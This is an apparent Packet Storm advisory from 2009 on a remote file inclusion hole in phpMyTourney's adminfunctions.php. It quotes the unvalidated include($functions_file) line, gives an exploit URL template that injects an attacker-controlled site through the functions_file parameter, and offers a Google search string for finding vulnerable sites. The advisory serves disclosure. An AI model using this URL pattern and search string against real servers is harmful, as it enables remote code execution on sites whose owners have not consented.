phpMyTourney Remote File Inclusion

2009-06-16T00:00:00
ID PACKETSTORM:78435
Type packetstorm
Reporter Am!r
Modified 2009-06-16T00:00:00

Description

                                        
                                            `Hi  
a bug in phpMyTourney that allows to us to occur a Remote File Include on a Remote machin.  
  
Bug :  
  
  
#####################################################################################  
# #  
# Islamic Republic Of Iran Security Team #  
# #  
# Www.IrIsT.Ir #  
# #  
#####################################################################################  
# #  
# phpMyTourney adminfunctions.php Remote File Include Vulnerabilities #  
# #  
# Download......: http:/phpmytourney.sourceforge.net #  
# #  
# file; #  
# dminfunctions.php #  
# #  
# bug; #  
# #  
# include($functions_file); #  
# #  
# Exploit...: http://[site]/[path]/admin/adminfunctions.php?functions_file=[Site]? #  
# #  
#####################################################################################  
# Bug Found.....: IrIsT™ #  
# #  
# discovery.....: Am!r (IrIsT™) #  
# #  
# contact.......: IrIsT.Ir[at]Gmail.Com #  
# #  
# Google Search.: "Powered By phpMyTourney" #  
# #  
#####################################################################################  
`